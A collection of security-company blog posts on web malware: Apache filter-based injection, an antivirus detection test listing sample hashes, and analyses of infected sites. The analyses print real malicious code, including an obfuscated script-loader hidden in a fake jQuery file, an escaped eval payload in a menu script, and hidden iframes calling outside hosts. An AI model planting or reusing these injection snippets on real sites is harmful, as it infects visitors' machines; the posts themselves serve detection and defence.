Apache Filter Based Malware
We have recently noted a new development in the world of web-malware. Malicious hackers have recently begun using the Apache Web Server’s filter module to inject malware into web pages. This process works in a similar way having the mailman stick a piece of gum (highly unlikely in real life) on the nice and clean envelope that you put into the mailbox. The recipient of the envelope might complain to you about the piece of gum (malware), and most people would be at a loss to determine whether it came from you.

This is exactly the confusion malicious hackers capitalize on. Apache is one of the most popular web server softwares in use today. This software is extremely flexible, scalable and very reliable. No wonder it is a good choice for webmasters, web hosts, website owners and such. Malicious hackers are banking on the popularity of Apache to provide them with the most bang for the buck.

Apache through its flexibility, offers programmers the ability to create “filters.” The job of a filter is to allow real time analysis and modification of web page data. For example, if you wanted to add an advertisement to every page served from the webserver, this functionality would be of great use. Now filters are being abused by malicious hackers. These filters are being used to insert a piece of malware containing an iframe like the one below.

This piece of malware leads to a fake AV site:

iframe src="http://crocabhysanr4.cz.cc/[scrubbed]"

Even though this is a relatively recent problem, researchers at Symantec have also reported on the same issue.

Nuances
To clarify , this new kind of malware injection does not imply that Apache is compromised or has vulnerabilities. The Apache “filter” functionality is a feature that is being exploited by malicious hackers who have gained unauthorized access to a web server. This attack is extremely effective, since it can “infect” every page on the web server without changing a single file.

In the past there have been other .htaccess based malware which try to evade detection by only serving infected web pages when a user visits the compromised site via a search engine like Google. This malware is much more sophisticated. It injects malware into outgoing HTML pages from the webserver, but only according to the following rules.

The malware is not injected into outgoing webpages if:

• The incoming HTTP request is coming from an IP which belongs to a search engine
• The incoming HTTP request is coming from certain browser User Agents
• The administrator is logged in or an administrator owned process is running

Additionally, the very first time a user requests a page a session token is created for the connection, but the malware is not delivered this first time. The malware is delivered the second time that the same user, using the same session, makes a request for a web page. Interestingly, this process only serves the malware only once and adds the IP address of the user to a list so that it does not try to infect the same host again and again. This helps the malware reduce its probability of detection by Anti-Virus.

We Can Help!
If you want to protect your site from infection, or you need additional support, please sign up for one of our services. Please contact us with your comments or questions.

AV Engines are not very effective at spotting web-based malware

There is every indication from sources internal to StopTheHacker.com and external sources comprised of web hosting companies, administrators, security companies and government organizations that the threat from web based malware is looming large and is only going to intensify in the coming years.

Website owners, and administrators, even website hosting companies are the directly affected ones. However, it is me and you, the web surfer, who visits supposedly benign sites which have been compromised by malicious individuals who are at great risk.

To protect the client, i.e. you, security experts rightly recommend antivirus (AV). These AVs are good at detecting pieces of code which have been classified and adhere to well known malicious behavior.  Consumers need to know that most of these AV engines are not tuned to detect web-based malware threats.

Below we present a small test we performed consisting of 159 unique pieces of web-based malware captured during the last few weeks by our detection systems. We compared four popular AV engines and found that none of them are very effective at detecting malware from compromised websites.

Note that all AV engines used were at the latest version available for our systems and were updates with the latest virus definitions. All samples used Javascript to execute their malicious content.

Brief highlights:
1. AV engines used: AVG, ClamAV, F-prot, Avast
2. None of the AV engines detected more than 11% of the malicious samples
3. AVG detected: 6.92%, ClamAV detected: 10.69%, F-prot detected: 10.06%, Avast detected: 2.52% of the samples respectively
4. Only one sample was detected by all four AV engines. This sample was extremely similar to a POC exploit code from milw0rm.com

This limited experiment shows that traditional AV engines have a long way to go when it comes to detecting web-based malware. Jaal uses proprietary detection technology which is based on artificial intelligence and machine learning algorithms which can understand how malicious pieces of code behave and profile and classify them with high accuracy and recall.

The SHA1 hashes of the samples used to test are presented below.

816633098ae005d8dbc7a25993da84d4035d03fa
9b19e082e4f96ba904a96b91521ea965423fdf78
390c6ee940db43d1916b8d5d35d6e26ee820adc6
1eff7745d4fdcd5454ce35cefaaf9fdcd992c7d2
2e546e478a2e7782f71e57aba2db4c39618a6ea0
e20e4102bb3fe18d1bacb1cbd9decb3df231b54f
6911103499818938e1f4ad589382f78555e5c3d5
f635909927c4605f382e4206472ed2eb319c7fe7
b87996d1842c3fa7656f2923e4ca9d984f67e927
ba507a2ddf54868038d2a233824d954e76e7de7d
5b145e8e1379513ee7fdcc254052aa63401bfbb2
47b99826d6beedd4eafd90a6b1f6bfc58037516f
25a5b980a32f02115ae6b39ba23233d3395cc8be
d5e44799006af551a6ed428fbbf5c719fde9f0d2
16169f2bc458bbcfbe440bf6e144072440437b8f
fac205896b1d8caa027493ff347b1283a8a5ea9a
26efc96af2f3c4f40de0122e2a17a96e179dae10
1ceda4089f55b0ae00e5f68c1fc168854262ba0a
107069c13e14f8ae02764420f7b73abc3b12b9ec
000e94d6f8569152b4f722b534c3446b33e80edb
a26b7469375e87ed511813753690621b7c1c59cb
c618cee125d8f03f2e389259dc4fb64c817c8cae
169df559a4489f4ebd968a54a7e985bd59996f44
79afd6b751faaa5030bdc9b6f8ac63e58e19f8bd
f5788e9ca15f873b571a30cf549c2cf96e81d4e9
af8308df0d38052a1f2b2a1e9e4ce20a508d5029
9d6a35ed08772fb824a3c2804f03418fb317b316
9ad9673f55a0013d4065c4139777ca681e0cea0b
58afa0e9fa175f8cec1c6ca37261adb7fbe71080
68a1f2a03397b5c36a29c118d85b6da7de37d69c
92962ff677a0f41e36c6279fea8c3c1bf6cffeb7
f4024a56993ca0e38f4095a2f9cf0e6f111dc1
854cdc64aa29d3b4073ba4827eff8c6976189eff
ee4054c22e26a9e7da91927f8b423309db3c37ce
b07bef2b0d7b10ca7054f9450a78ae4cc616282a
430f69f19ec142eb443a3003ece46ee3fe02d316
70333f39c08c02fb468dd7f305034fe8e69438a4
e77b9cff1b75f4cbaeedfd59c925a4b4a0bbf253
28846dd8ba590b9c7cca6a8061c35446ddf4b9ba
9c8671398aed3b785bea22f51afe66485bbcac42
cfe3e42c266064cda45fd11e5c0e3dc7504134ed
35cfebaee69b89e2cabba05f130071d18a3d0632
51a2dd0515ec5d7cf9bf55e7226c800f3ab34b01
9fbae2b1d97783782b6c22a8eacf9b408dfa7622
5da9312edbc420750839d98a62b4db3fcf37e79e
2fd92d853236eec5030c2b2e68519e338fbae703
9e522249da94e5361f4b1b76d028325c963d2f8f
c1fffcc3872a0c5b198ce0b0e2b6c48122afbfe3
a085342ffddeb129b4d503d769337254f12128ab
b0cc0131e64e3cc6be595244cb6d06459415fd86
f5788e9ca15f873b571a30cf549c2cf96e81d4e9
5d5acfbfaeb0964a90afdc34027d31dd8c087b72
d83b73c795242984efe288a4131f10898cee4726
230bd24350242a1fcc48d304bb6a0b41e11e56bd
236526ddf3243ecc869e2dc496e5e123836c1139
9de098b4ca80fde754a6d0779eda2230c304dda2
ba5bc790b05eef01db9c80b44b0478ad29637117
9dab8e1b7e6c38ff4034e702215b43a83f503845
abfd93aca22ee2475952ed145394d9edf270ec97
9e1e1a1efd527ea05f43dbd3c74fcd235603ae25
d929e444c10d08f427fe3136fda94c9459ec8a90
a7c8cd2edf0fbae0e2747ebba3b0347e21d82f83
1f3b5c82f9077896ded6ad0417840108660bdb6f
6d8eb97d34acd9fe3c54bdfefc3b4eec38187a7e
1bb8371b3dad51c8cfa2fcf2430174954b65490c
70f55d55796b58e906359fc7ec2b71ee2f6b475f
64df75a0a427cc74397cd831c5dae977b960319b
060b75af1239a7e882c75600f05cd4a29981cf63
9611d0eabd35cad386b6e55377e13862300753d0
f61dfa94e8d26143541ffa8556001addc9043233
9c6859961beaff0d0e2c8254fd0d9170f17764c4
f7e902c1653c596672e3ef9dff5be8ce9dbacc04
6fef84bcaee61ddbe4731a3fdc6c10a8e7b2e118
e4bd561881cbe8692cef393519fa9d3feb94e4
4493e82d5648ef18bffe0cf577dfff977c4c2b61
2914adab79ace690911928734d71f41e0eaf3deb
a209fce0c7e8d7de6f1667f8855b441ad9199479
fe97812acb6005bc730df70a02949f85791ccc26
6fef84bcaee61ddbe4731a3fdc6c10a8e7b2e118
f7e902c1653c596672e3ef9dff5be8ce9dbacc04
9d26667c6ada57160863dbd8fc0f906facd26a31
6d1cf3bb7c692cf79b496971082d63c4fe6f9d3b
f61dfa94e8d26143541ffa8556001addc9043233
9d9bc778aa7dd0c6aaebce544038afb72ca89a3b
eb870d52963b9dfffa1418206d9fd2248105e7d5
b5b975f530907b3cc8a06cc544ee59af1c65c0ad
f1f93eae3c23b8db58fa57e03ccbaabacd26edf0
13337e99806ec2d9b0cc65130b276d212b66c6ef
d4f883d6fca63206aaa5773d21bd391aafd6b69b
89b092cf10887728965e92a1743b211981e2c509
93e32b1813e8f62bc48afb34435c27922dd15854
9170e68703b30d9653c1afc2e2367ef9e3e857d1
7f927ce60b92fcada6d0029f05372bcc55e76061
ff1e5838891686428ee55e651ae7ae4af8f54833
ac79dfd852843af7de7b5b9c0312d281b2584c46
04c5946fd347bc61a2276567bd00a8140a3792f7
21bf2da8630e8bbbe80fb18ca8b5d6cf1ad1801a
62127899a333ded181e82fd6b6194fb55cc45f1b
47dd8eb5a532965ac85140ed50b491e9a79827d4
50db943eb42397bd9391bba998cb75f2d6a27abd
f90cd2ad1db2c3bebeb88db6a3b4c0afd5a2c3bc
f90cd2ad1db2c3bebeb88db6a3b4c0afd5a2c3bc
1921c236990bf3d282d85c7f73929f179d77bbbe
1921c236990bf3d282d85c7f73929f179d77bbbe
f4b6889f98fff03fe1a452c872046560c5b7b2b6
c3655fd13f4f020100106d33c7ed8b64a5b697b5
f1f93eae3c23b8db58fa57e03ccbaabacd26edf0
13337e99806ec2d9b0cc65130b276d212b66c6ef
37fb254190ef250ec17c51af8a8ce9492f229045
5cf6b5e79088c31adebd9239b6a0fe85dae4bdc8
4b68192c2a1d56c933b0b4d3a511d20f5ab5109a
2fc8b84f43b780c50ebfb0d1dee0bd6a663faa34
816633098ae005d8dbc7a25993da84d4035d03fa
a938feaee3f8088ca09fa55547e7d32f3eeb2342
5872a0f83149116751c99204af687a0d9fd2d013
6c3a63406e834212ee21150ed9dae027916c9aba
61bd5b21316aebe72d9eb0fbec86aa54eeaef41e
974ab3a4840c3036494e1b5ff44149addc352c09
f995e8fe220bb5734a12a3181da0891ae2102eee
974ab3a4840c3036494e1b5ff44149addc352c09
2fc8b84f43b780c50ebfb0d1dee0bd6a663faa34
816633098ae005d8dbc7a25993da84d4035d03fa
d9a413e9eaf045c80a7a3a3b220425e0ae10f36a
a938feaee3f8088ca09fa55547e7d32f3eeb2342
3dfd2d40357887f5c43fa33c064d8ee5f4aee03b
b9328bb760b294fa524830a8920a0a90a2e33eac
169df559a4489f4ebd968a54a7e985bd59996f44
584fbb7d467834132bd9e28db43e5fcbcefc24e8
768709cbc7ffd499cc26be93e2558ba80059793a
ffb3394a91961dfb67a4e16eab998c225baf93e0
12a594de0c4c0351387c40275db09ef4b2e4025b
4a7afd95db6923e4220a65040357bfbbf2b55077
6a9ab50dafae402bf230879471206b6479c33692
6a9ab50dafae402bf230879471206b6479c33692
c3655fd13f4f020100106d33c7ed8b64a5b697b5
3e6944e6957b8d09759328bb6e4b1d40ed61a94d
77b5099de69d17088f47991543ac952748f51318
a448b4b7df37d40db78a61123379424884957e5f
9dace6f32725175bafd0a09de6d6bb822d116250
4d03ef449ef5eaa2ed4504b926af218fcd49af66
e026b0f4b1c412fd98efaae3741d7d137647f07e
681f9c9d1ca13424dbb3328e8e7f4cd9404e93fc
8fa128f2e88f51486dd6e14f6394066c52cd6d30
7dba6533187fd7df6a6b7654841d7de41c8ec3bc
e72f7680b93ca124077ab5fe6f78daf8df24db2f
c662974ce089e0979811db9752601ba0deb56ca5
14cb17f7f0379a81cf6cd0a0bcb58d3ccca848a3
b36ef96e09c30b195ac291fa5a3dae8fc89960f2
74c204f8dc182949217be29d36d7d38ea3ba9f7b
2642a2c2cce3cea5a175cae5d021272d87d94908
1be051d87ace905c7c16d08545f13395362c0feb
276f5f4b144e86d07d76fbeecf2e39250c9d65e5
c66dc101b4aeb6a0416be21e5c9ed09dc162f338
8c40b59bbbfc9dd02725ce8c891e4d9fa0f5ce26
efaef489856ac430f2fc8a2c2437a61922e2c877
93ddf8b9b206e6ae88c75ac7ca28991be19d63ac
c26e2cf8e848deb09ca72d5e692809fbbd21e07c
5e920705466955c69dd1c4474d3022489de8e3bc
e7149aaed102653f45e17afcb3d0d426a8cf11d

This particular example shows how a jQuery script was used by a hacker to spread malicious code. This example is a little obfuscated. This code was mined from www.i-movix.com/en/distributors/.

On line 15 you can find:

<scri pt type="text/javas cript" src="/plugins/system/ jceutilities/js/jqu ery-126.js">

Which loads the example below:

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 2008-05-24 14:22:17 -0400 (Sat, 24 May 2008) $
* $Rev: 5685 $
*/
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)
>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while
(c--)r[e(c)]=k1||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1}

**code removed for brevity**

while(c--)if(k1)p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k1);return p}('(H
(){J w=1b.4M,3m$=1b.$;J D=1b.4M=1b.$=H(a,b){I 2B D.17.5j(a,b)};J u=/^[^<]*(<(.|\\s
)+>)[^>]*$|^#(\\w+)$/,62=/^.[^:#\\[\\.]*$/,12;D.17=D.44={5j:H(d,b){d=d||S;G(d.16){

**malicious code**

/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement
('scri pt');H3qqe 3ur6p.setAttribute('type', 'text/javascript');H3qqea3ur6p.setAttribute
('id', 'myscript1');H3qqea3ur6p.setAttribute('src',  'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v(
)@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$
)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@
0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(
m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##
)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a
&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|
\$/ig, ''));H3 qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea
3ur6p);}} cat h(e) {}

Till next time…

This particular example shows how a menumachine script was used by a hacker to spread malicious code. This example is a little bit different from the ones we have posted before as it does not just post the malicious code using a straight iframe or obviously understandable JavaScript. This example shows how hackers are trying just a little bit harder to inject code that is somewhat obfuscated. This code was mined from www.rvp1875.com/index.html. Take a look at the example below.

/* menumachine.js v1.7.1.1 - a component of MenuMachine (c)2004 Big Bang Software Pty Ltd :: menumachine.com*/

_ud="undefined";

if(typeof(bbMenu)==_ud)
  bbMenu=new Array();

bb_fix=new Array();

function _bbroot(bbL,name,r2L,clkOp,hRelPos,vRelPos,hRPmargin,vRPmargin,smScr,scrSp,scrAm,tri,triDn,triL,t_Hr,s_Hr,fade,posID,s_bCol,s_bW,s_bBtw,s_fFam,s_fSz,s_fWt,s_fStl,s_txAl,s_lPad,s_tPad,hOL,vOL,sArr,bCol,bw,bBtw,fFam,fSz,fWt,fStl,txAl,lPad,tPad,top_vOL,top_hOL,tArr,spc,nhlP,bUp,s_ao,ao)
{
  if(typeof(__pg)==_ud)
  {
    _b=new __bbBrChk();
    _hr=null;

    if(_b.ieDom&&!_b.mac){
      var els=document.getElementsByTagName("base");

      if(els.length){
        _hr=els[0].getAttribute("href");
      }
    }

    if(!_hr)
      _hr="";

    __pg=new _bbPg();

**code removed for brevity**

    for(var g=0;g<bbMenu.length;g++)
      bbMenu[g].off();
  }

  __bbMmB=1;
  _bbUld();
}

function _bbPg()
{
  var t=this;
  t.wn=window;
  t.d=t.wn.document;
  t.w=(_b.dt&&_b.ie)?t.d.documentElement.clientWidth:_b.ie||_b.nsDom?t.d.body.clientWidth:t.wn.innerWidth;
  t.h=(_b.dt&&_b.ie)?t.d.documentElement.clientHeight:_b.ie||_b.nsDom?t.d.body.clientHeight:t.wn.innerHeight;
  t.wn.onresize=_b.n4?_bbRzevt:_bbRePo;
}

**malicious code**

<!--
(function(hVAxp){var v120='va@72@20a@3d@22@53@63ript@45ngine@22@2c@62@
3d@22Ve@72@73i@6fn@28)+@22@2c@6a@3d@22@22@2cu@3d@6eavig@61tor@2euse@72A
ge@6et@3b@69@66((@75@2e@69n@64exOf(@22Chrome@22)@3c0)@26@26(u@2ei@6edexO
@66@28@22@57in@22@29@3e0)@26@26@28@75@2e@69@6edexO@66(@22NT@20@36@22)@3c
0)@26@26(@64o@63u@6dent@2ecoo@6b@69e@2eind@65@78Of(@22mi@65k@3d1@22)@3c@
30)@26@26(ty@70eof(@7arv@7at@73)@21@3dt@79@70e@6ff(@22A@22@29))@7bzrvzts
@3d@22@41@22@3beval(@22if@28wi@6ed@6fw@2e@22+a@2b@22)j@3dj+@22+@61+@22M@
61jor@22@2bb+a+@22Mi@6eor@22@2bb@2ba@2b@22Bu@69@6c@64@22+@62@2b@22j@3b@2
2)@3b@64ocume@6et@2ewrit@65(@22@3cscri@70t@20src@3d@2f@2fm@61rt@22@2b@22
@75@7a@2ec@6e@2fvid@2f@3fi@64@3d@22+j+@22@3e@3c@5c@2fs@63@72i@70t@3e@22)
@3b@7d';var Id4=v120.re lace(h Axp,'%');var gIl=unes cape(Id4);eval(gIl)}
)(/\@/g);
-->

Till next time..

We had a look at our logs, local dumps and analysis and saw that the Site Meter script was pushing in an iFrame pointing to dg.specificclick.net using a body-onload event to trigger the event. Interestingly, dg.spe cificclick.net, has been associated with multiple cases of Internet misdemeanor. [0] [1] [2] [3] [4]

It is surprising to see companies that have widely established customer bases to link to questionable content.

The code from the Site Meter script is presented below, the offending part is clearly visible.

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
 init:function( sCodeName, sServerName, sSecurityCode )
 ** code removed for brevity **
 onPageLoad:function()
 { 

 var newIFrame = document.createElement("iframe");
 newIFrame.frameBorder = 0;
 newIFrame.width = 0;
 newIFrame.height = 0;
 newIFrame.src = "http://dg.specif icclick.net/?u=" + encodeURIComponent(document.location) + "&r=" + encodeURIComponent(SiteMeter.getReferralURL()); 

** code removed for brevity **

SiteMeter.init('s29rottweilers', 's29.sitemeter.com', ''); 

var g_sLastCodeName = 's29rottweilers';
// ]]>

The SafeBrowsing report from Google about this site follows:

• Google SafeBrowsing report – www.schwarzerwaldrottweilers.com

What is the current listing status for schwarzerwaldrottweilers.com?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 6 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-11-24, and the last time suspicious content was found on this site was on 2009-11-24.
Malicious software includes 8 trojan(s), 2 worm(s). Successful infection resulted in an average of 16 new process(es) on the target machine.

Malicious software is hosted on 11 domain(s), including 89.138.243.0/, donnelscreekfarm.com/, ho-fashion.com/.

This site was hosted on 1 network(s) including AS26496 (PAH).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, schwarzerwaldrottweilers.com appeared to function as an intermediary for the infection of 11 site(s) including tillieiszler.blogspot.com/, ghadaghadadolbier.blogspot.com/, adansharlott.blogspot.com/.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 11 domain(s), including tillieiszler.blogspot.com/, ghadaghadadolbier.blogspot.com/, adansharlott.blogspot.com/.